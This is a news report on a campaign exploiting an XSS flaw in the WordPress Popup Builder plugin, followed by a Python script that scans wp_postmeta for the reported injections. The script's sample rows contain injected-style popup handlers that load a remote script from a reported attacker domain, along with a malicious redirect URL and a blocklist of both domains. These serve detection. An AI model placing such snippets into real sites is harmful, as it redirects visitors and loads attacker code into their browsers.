A vulnerability in the WordPress plugin Popup Builder was used to hack 3,900 websites

Researchers warn that hackers are targeting WordPress sites using a vulnerability in outdated versions of the Popup Builder plugin. According to Sucuri, this method has already compromised over 3,900 websites in just three weeks.

The attackers are exploiting CVE-2023-6000, a cross-site scripting (XSS) vulnerability in the Popup Builder plugin (versions 4.2.3 and older), which official statistics put at 200,000 installations.

This issue was initially discovered in November 2023, and since then, it has been used for widespread attacks. For example, in early 2024, it was reported that more than 6,700 WordPress sites using the vulnerable version of the Popup Builder plugin were hacked as part of the Balada Injector malicious campaign.

Sucuri experts now warn of a new campaign targeting the same vulnerability in Popup Builder. It appears that not all administrators have installed patches, as code injections related to the new attacks can be found on 3,900 sites according to PublicWWW (Sucuri’s own scanners detected 1,170 infections).

The attacks target the Custom JavaScript or Custom CSS sections of Popup Builder in the WordPress administrative interface, and the malicious code is stored in the wp_postmeta database table. The attackers register their code as an event handler for various Popup Builder events, including sgpb-ShouldOpen, sgpb-ShouldClose, sgpb-WillOpen, sgpbDidOpen, sgpbWillClose, and sgpb-DidClose. As a result, the malicious code is triggered by specific plugin actions, such as opening or closing a popup window.

The main objective of these injections is to redirect visitors of infected sites to malicious addresses (phishing pages and sites distributing malware). In some cases, analysts observed the insertion of a redirection URL (hxxp://ttincoming.traveltraffic[.]cc/?traffic) as a redirect-url parameter for the contact-form-7 popup window.


The injected code retrieves a snippet of malicious code from an external source and embeds it in the web page’s header for execution by the browser. Researchers note that this method allows attackers to perform actions that could be much more severe than simple redirections.

Currently, the attacks originate from only two domains (ttincoming.traveltraffic[.]cc and host.cloudsonicwave[.]com), so specialists strongly recommend blocking them.
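Beyond blocking those two domains, a site owner can check the database directly for the injection the report describes. The following is an added example, not Sucuri’s tooling: it builds an in-memory SQLite copy of wp_postmeta with constructed rows and flags entries that reference one of the two reported domains, or that bind to a Popup Builder event and load something from a host other than the site’s own. The meta_key names and the jQuery handler syntax in the sample rows are assumptions for illustration, not the plugin’s real storage format.

```python
import re
import sqlite3

# Event names the report says the injected handlers attach to.
SGPB_EVENTS = ("sgpb-ShouldOpen", "sgpb-ShouldClose", "sgpb-WillOpen",
               "sgpbDidOpen", "sgpbWillClose", "sgpb-DidClose")
# The two domains named in the report, undefanged so string matching works.
KNOWN_BAD_HOSTS = {"ttincoming.traveltraffic.cc", "host.cloudsonicwave.com"}
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def load_sample_db(site_host="example.org"):
    """Constructed wp_postmeta rows (meta_key values are placeholders)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_postmeta (meta_id INTEGER PRIMARY KEY, "
                 "post_id INTEGER, meta_key TEXT, meta_value TEXT)")
    rows = [
        # 1: benign custom JS, no external reference
        (1, 10, "sg_popup_custom_js",
         "jQuery(window).on('sgpbDidOpen', function(){ console.log('opened'); });"),
        # 2: handler loading a script from a reported domain
        (2, 10, "sg_popup_custom_js",
         "jQuery(window).on('sgpbDidOpen', function(){ var s=document.createElement('script');"
         " s.src='https://host.cloudsonicwave.com/x.js'; document.head.appendChild(s); });"),
        # 3: redirect-url pointing at the reported traffic domain
        (3, 11, "sg_popup_options", "redirect-url=http://ttincoming.traveltraffic.cc/?traffic"),
        # 4: handler that only redirects within the site itself
        (4, 12, "sg_popup_custom_js",
         "jQuery(window).on('sgpb-WillOpen', function(){ location.href='https://" + site_host + "/thanks'; });"),
        # 5: same pattern as row 2 but with an unknown external host (constructed)
        (5, 13, "sg_popup_custom_js",
         "jQuery(window).on('sgpb-ShouldOpen', function(){ var s=document.createElement('script');"
         " s.src='https://cdn.unknown-example.net/p.js'; document.head.appendChild(s); });"),
    ]
    conn.executemany("INSERT INTO wp_postmeta VALUES (?,?,?,?)", rows)
    return conn


def find_suspicious_postmeta(conn, site_host):
    """Return [(meta_id, reason)] for rows that deserve a manual look."""
    findings = []
    for meta_id, value in conn.execute("SELECT meta_id, meta_value FROM wp_postmeta ORDER BY meta_id"):
        hosts = {h.lower() for h in URL_RE.findall(value)}
        bad = hosts & KNOWN_BAD_HOSTS
        if bad:
            findings.append((meta_id, "known bad host: " + ", ".join(sorted(bad))))
        elif any(ev in value for ev in SGPB_EVENTS) and (hosts - {site_host.lower()}):
            findings.append((meta_id, "popup event handler references external host"))
    return findings
```

On a real site the same query runs against the production wp_postmeta table (with the site’s actual table prefix), and any flagged row should be compared against what the administrator actually entered in the plugin’s Custom JavaScript section.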
